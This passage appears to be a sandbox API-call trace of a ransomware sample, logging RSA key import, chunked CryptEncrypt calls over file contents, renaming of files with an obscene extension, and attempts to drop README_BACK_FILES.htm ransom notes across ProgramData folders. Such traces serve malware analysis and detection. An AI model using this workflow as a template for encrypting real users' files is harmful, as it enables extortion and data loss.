pdwFlags=0x0) returned 1 [0239.832] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0239.832] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28d6c30) returned 1 [0239.832] CryptImportPublicKeyInfo (in: hCryptProv=0x28d6c30, dwCertEncodingType=0x1, pInfo=0x28ca438*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28ca468*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28ca470*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28bee58) returned 1 [0239.832] CryptEncrypt (in: hKey=0x28bee58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0239.833] CryptEncrypt (in: hKey=0x28bee58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d6548*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28d6548*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0239.833] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d6548, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.833] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.833] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.833] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.833] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.833] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.833] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.833] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.833] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.833] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.833] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.833] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.833] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.833] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.833] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.834] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.834] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.834] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.834] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.834] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.834] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.834] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.834] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.834] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.834] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.834] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.834] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.834] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.834] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.834] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.834] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.834] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.834] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.834] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.834] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.835] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.835] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.835] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.835] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.835] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.835] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.835] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.835] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.835] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.835] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.835] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.835] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0239.835] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0239.835] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.835] ReadFile (in: hFile=0x5d10, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9dcd8*=0x27c, lpOverlapped=0x0) returned 1 [0239.835] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x27c, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x280) returned 1 [0239.835] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.835] CloseHandle (hObject=0x5d10) returned 1 [0239.835] CloseHandle (hObject=0xffffffff) returned 1 [0239.836] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\Pending.GRL.gsg" (normalized: "c:\\users\\all users\\microsoft\\mf\\pending.grl.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\users\\all users\\microsoft\\mf\\pending.grl"), bFailIfExists=0) returned 0 [0239.836] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\Pending.GRL", dwFileAttributes=0x80) returned 1 [0239.836] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\Pending.GRL.gsg" (normalized: "c:\\users\\all users\\microsoft\\mf\\pending.grl.gsg")) returned 0 [0239.837] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\users\\all users\\microsoft\\mf\\pending.grl"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\Pending.GRL.fuck" (normalized: "c:\\users\\all users\\microsoft\\mf\\pending.grl.fuck")) returned 0 [0239.837] CryptDestroyHash (hHash=0x28bee18) returned 1 [0239.837] CryptDestroyKey (hKey=0x28bf218) returned 1 [0239.837] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0239.838] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0239.838] FindClose (in: hFindFile=0x28bf018 | out: hFindFile=0x28bf018) returned 1 [0239.838] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\mf\\readme_back_files.htm")) returned 0xffffffff [0239.838] AreFileApisANSI () returned 1 [0239.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd7c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0239.838] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\MF\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\mf\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.838] GetLastError () returned 0x5 [0239.838] GetLastError () returned 0x5 [0239.838] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0239.839] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\NetFramework\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28bf1d8 [0239.839] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.839] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.839] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28bf018 [0239.840] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.840] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.840] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0239.840] FindClose (in: hFindFile=0x28bf018 | out: hFindFile=0x28bf018) returned 1 [0239.840] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\readme_back_files.htm")) returned 0x20 [0239.840] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0239.840] FindClose (in: hFindFile=0x28bf1d8 | out: hFindFile=0x28bf1d8) returned 1 [0239.840] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\NetFramework\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\netframework\\readme_back_files.htm")) returned 0xffffffff [0239.840] AreFileApisANSI () returned 1 [0239.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6f28, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0239.840] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\NetFramework\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\netframework\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.841] GetLastError () returned 0x5 [0239.841] GetLastError () returned 0x5 [0239.841] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0239.841] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Network\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28bee18 [0239.841] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.841] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.841] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Network\\Connections\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28bf018 [0239.842] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.842] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0239.842] FindClose (in: hFindFile=0x28bf018 | out: hFindFile=0x28bf018) returned 1 [0239.842] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Network\\Connections\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\network\\connections\\readme_back_files.htm")) returned 0xffffffff [0239.842] AreFileApisANSI () returned 1 [0239.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6e20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0239.842] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Network\\Connections\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\network\\connections\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.843] GetLastError () returned 0x5 [0239.843] GetLastError () returned 0x5 [0239.843] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.843] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Network\\Downloader\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0xffffffff [0239.843] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Network\\Downloader\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\readme_back_files.htm")) returned 0xffffffff [0239.843] AreFileApisANSI () returned 1 [0239.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6d70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0239.843] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Network\\Downloader\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.846] GetLastError () returned 0x5 [0239.846] GetLastError () returned 0x5 [0239.846] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0239.846] FindClose (in: hFindFile=0x28bee18 | out: hFindFile=0x28bee18) returned 1 [0239.846] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Network\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\network\\readme_back_files.htm")) returned 0xffffffff [0239.846] AreFileApisANSI () returned 1 [0239.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0239.846] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Network\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\network\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.847] GetLastError () returned 0x5 [0239.847] GetLastError () returned 0x5 [0239.847] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0239.847] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Office\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28bee18 [0239.847] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.847] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.847] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0239.847] FindClose (in: hFindFile=0x28bee18 | out: hFindFile=0x28bee18) returned 1 [0239.848] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Office\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\office\\readme_back_files.htm")) returned 0xffffffff [0239.848] AreFileApisANSI () returned 1 [0239.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0239.848] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Office\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\office\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.848] GetLastError () returned 0x5 [0239.848] GetLastError () returned 0x5 [0239.848] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0239.848] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28bf1d8 [0239.849] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.849] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.849] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0239.849] GetLastError () returned 0x5 [0239.849] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\countrytable.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\countrytable.xml")) returned 0x20 [0239.849] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\countrytable.xml", dwFileAttributes=0x80) returned 0 [0239.849] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\countrytable.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\countrytable.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 